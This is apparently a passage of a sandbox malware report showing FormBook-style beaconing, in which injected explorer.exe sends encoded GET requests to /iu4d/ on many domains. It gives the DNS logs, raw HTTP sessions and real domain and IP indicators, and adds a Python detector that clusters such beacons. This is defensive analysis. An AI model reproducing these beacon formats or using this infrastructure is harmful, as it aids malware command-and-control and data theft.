Apr 8, 2021 11:05:44.853007078 CEST | 8.8.8.8 | 192.168.2.5 | 0x28d8 | No error (0) | www.betbonusuk.com |  | 172.67.187.138 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:44.853007078 CEST | 8.8.8.8 | 192.168.2.5 | 0x28d8 | No error (0) | www.betbonusuk.com |  | 104.21.7.67 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:50.003463030 CEST | 8.8.8.8 | 192.168.2.5 | 0x31e7 | No error (0) | www.yashaerotech.com | yashaerotech.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:05:50.003463030 CEST | 8.8.8.8 | 192.168.2.5 | 0x31e7 | No error (0) | yashaerotech.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:05:55.490092039 CEST | 8.8.8.8 | 192.168.2.5 | 0x67 | Server failure (2) | www.gmopanama.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 11:06:00.623815060 CEST | 8.8.8.8 | 192.168.2.5 | 0x9958 | No error (0) | www.adamspartnership.com |  | 138.197.103.178 | A (IP address) | IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.runcouver.com
                                                              • www.aa29996.com
                                                              • www.ux300e.com
                                                              • www.mvprunning.com
                                                              • www.getboostphlo.com
                                                              • www.okitmall.com
                                                              • www.cqsjny.com
                                                              • www.betbonusuk.com
                                                              • www.yashaerotech.com
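
The HTTP sessions recorded in this report all have one shape: after injection, C:\Windows\explorer.exe sends GET /iu4d/?AR6=<varying>&nflLiT=xPJxAxbPf to a different host roughly every five seconds, with only Host and Connection: close headers, no User-Agent, and it keeps cycling through the domain list no matter what the server answers (403, 200, 410 and 404 all appear below). The Python below is an added example, not part of the Joe Sandbox report, of detection logic that keys on that shape rather than on any single domain, so it still fires when the decoy list changes. The request heads are copied from the sessions on this page; the timestamps are truncated to microseconds, and the chrome.exe path and its three favicon requests are constructed controls to show that a bare host-count rule would misfire on a browser.

```python
"""Flag FormBook-style HTTP beaconing: one process sending the same URI path
and one constant query parameter to many unrelated hosts within seconds,
without a User-Agent. Added example; not code from the sandbox report."""
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

EXPLORER = r"C:\Windows\explorer.exe"
# Hypothetical control process; the browser requests below are constructed.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"


def _req(path_query, host, user_agent=None):
    """Build a minimal request head in the shape this report shows."""
    head = f"GET {path_query} HTTP/1.1\r\nHost: {host}\r\n"
    if user_agent:
        head += f"User-Agent: {user_agent}\r\n"
    return head + "Connection: close\r\n\r\n"


# Constructed sample: (timestamp, client process, raw request head).
SAMPLE_REQUESTS = [
    ("2021-04-08 11:05:00.766391", EXPLORER, _req(
        "/iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf",
        "www.runcouver.com")),
    ("2021-04-08 11:05:06.474777", EXPLORER, _req(
        "/iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf",
        "www.aa29996.com")),
    ("2021-04-08 11:05:11.863981", EXPLORER, _req(
        "/iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf",
        "www.ux300e.com")),
    ("2021-04-08 11:05:16.982394", EXPLORER, _req(
        "/iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf",
        "www.mvprunning.com")),
    ("2021-04-08 11:05:22.258661", EXPLORER, _req(
        "/iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf",
        "www.getboostphlo.com")),
    ("2021-04-08 11:05:28.222840", EXPLORER, _req(
        "/iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf",
        "www.okitmall.com")),
    # Controls: a browser fetching the same path from three sites, with a UA.
    ("2021-04-08 11:05:01.000000", CHROME, _req("/favicon.ico", "www.example.com", "Mozilla/5.0")),
    ("2021-04-08 11:05:02.000000", CHROME, _req("/favicon.ico", "www.example.net", "Mozilla/5.0")),
    ("2021-04-08 11:05:03.000000", CHROME, _req("/favicon.ico", "www.example.org", "Mozilla/5.0")),
]


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, path, query params and headers."""
    request_line, _, rest = raw.partition("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in rest.split("\r\n"):
        if not line:          # blank line ends the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "params": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "host": headers.get("host", "").lower(),
        "user_agent": headers.get("user-agent"),
    }


def find_beacon_clusters(requests, min_hosts=3, window_s=60.0):
    """Group requests by (process, method, path, query parameter names) and
    report groups that reach min_hosts distinct Host values inside window_s
    seconds and look non-browser-like: no User-Agent on any request, or at
    least one query parameter whose value never changes across hosts."""
    groups = defaultdict(list)
    for ts, process, raw in requests:
        req = parse_request(raw)
        key = (process, req["method"], req["path"], tuple(sorted(req["params"])))
        groups[key].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), req))

    alerts = []
    for (process, method, path, names), items in groups.items():
        hosts = sorted({req["host"] for _, req in items})
        if len(hosts) < min_hosts:
            continue
        times = [t for t, _ in items]
        span = (max(times) - min(times)).total_seconds()
        if span > window_s:
            continue
        # Parameters whose value is identical in every request of the group.
        constant_params = {
            name: items[0][1]["params"][name]
            for name in names
            if len({req["params"][name] for _, req in items}) == 1
        }
        no_user_agent = all(req["user_agent"] is None for _, req in items)
        if not (no_user_agent or constant_params):
            continue
        alerts.append({
            "process": process, "method": method, "path": path, "hosts": hosts,
            "span_s": round(span, 3), "constant_params": constant_params,
            "no_user_agent": no_user_agent,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_beacon_clusters(SAMPLE_REQUESTS):
        print(alert)
```

Run against the constructed sample this reports exactly one cluster: explorer.exe, path /iu4d/, six hosts in about 27.5 seconds, nflLiT=xPJxAxbPf constant while AR6 varies, no User-Agent. The chrome.exe favicon group also reaches three hosts but carries a User-Agent and has no query parameters, so it is dropped; in a real deployment the grouping key and thresholds would be fed from proxy or EDR HTTP telemetry rather than from an inline list.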

                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49718 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:00.766391039 CEST | 1290 | OUT | GET /iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.runcouver.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:00.881786108 CEST | 1291 | IN | HTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Thu, 08 Apr 2021 09:05:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "606abe3b-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49721 | 147.255.37.207 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:06.474777937 CEST | 1337 | OUT | GET /iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.aa29996.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:06.645096064 CEST | 1338 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 08 Apr 2021 09:05:06 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49727 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:11.863981009 CEST | 5003 | OUT | GET /iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.ux300e.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:11.881622076 CEST | 5003 | IN | HTTP/1.1 410 Gone
                                                              Server: openresty/1.13.6.2
                                                              Date: Thu, 08 Apr 2021 09:04:23 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 75 78 33 30 30 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 36 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 75 78 33 30 30 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='5; url=http://www.ux300e.com/' />a </head>9 <body>36 You are being redirected to http://www.ux300e.coma </body>8</html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49728 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:16.982394934 CEST | 5622 | OUT | GET /iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.mvprunning.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:17.162631035 CEST | 5622 | IN | HTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Thu, 08 Apr 2021 09:05:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "605e0bcb-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49729 | 172.67.219.254 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:22.258661032 CEST | 5624 | OUT | GET /iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.getboostphlo.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:22.638344049 CEST | 5625 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 08 Apr 2021 09:05:22 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: __cfduid=dfb3971d4184d632d73a1908cbee311771617872722; expires=Sat, 08-May-21 09:05:22 GMT; path=/; domain=.getboostphlo.com; HttpOnly; SameSite=Lax
                                                              CF-Cache-Status: DYNAMIC
                                                              cf-request-id: 095253b1640000a8c13d238000000001
                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F802H7kHqNcGEaM19LIsT0HTjHrjpPBTypNS7vtOf80a0axYnOpC46oJeo%2FijRhoiKFT5as3D5%2FwxLegLD2FcS%2FMFN%2BWUhKGAQQySsVBK6%2BbwWISsw%3D%3D"}],"group":"cf-nel"}
                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                              Server: cloudflare
                                                              CF-RAY: 63ca55623926a8c1-CDG
                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                              Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 75 34 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                              Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /iu4d/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49731 | 15.165.26.252 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:28.222840071 CEST | 5641 | OUT | GET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.okitmall.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:28.450283051 CEST | 5644 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 08 Apr 2021 09:05:28 GMT
                                                              Server: Apache
                                                              X-Powered-By: PHP/5.6.36
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: No-Cache
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 
29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 9d b4 eb a6 84 ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 20 20 20 20 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 83 9d eb 85 84 ec 9b 94 ec 9d bc ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4
Data Ascii: 1e04<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title>통합보험 비교견적사이트</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert('개인정보취급방침에 동의해 주세요.');f.agree.focus();return false;}if (f.customer_name.value == ""){alert('이름을 입력해 주세요.');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('
(The ASCII rendering dropped the UTF-8 Korean strings; they are restored here from Data Raw. Title: integrated insurance quote-comparison site. Alerts: please agree to the personal-information handling policy; please enter your name. The body is cut off mid-script in the capture.)


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
6          | 192.168.2.5 | 49732       | 198.148.114.222 | 80               | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:39.640341043 CEST | 5670 | OUT | GET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.cqsjny.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:39.795466900 CEST | 5670 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 08 Apr 2021 08:57:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
7          | 192.168.2.5 | 49735       | 172.67.187.138 | 80               | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:44.885164976 CEST | 5689 | OUT | GET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.betbonusuk.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:44.938178062 CEST | 5690 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Thu, 08 Apr 2021 09:05:44 GMT
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Thu, 08 Apr 2021 10:05:44 GMT
                                                              Location: https://www.betbonusuk.com/iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf
                                                              cf-request-id: 09525409c80000edd3948d6000000001
                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZF5J6NiyZJ1xWOxL1HbRgMnFhsl5L55L%2BmumTS%2F2zFKYcHwqadVLmwL5yKrJ9ELzoFLC7L7p%2FYsoGRwUdZAonvvH11mdTVYOHlAjMCxYfQqMn98%3D"}],"group":"cf-nel"}
                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                              Server: cloudflare
                                                              CF-RAY: 63ca55efaac0edd3-CDG
                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
8          | 192.168.2.5 | 49736       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:05:50.018143892 CEST | 5691 | OUT | GET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.yashaerotech.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
Apr 8, 2021 11:05:50.132699966 CEST | 5692 | IN | HTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Thu, 08 Apr 2021 09:05:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "6063a886-113"
                                                              Via: 1.1 google
                                                              Connection: close
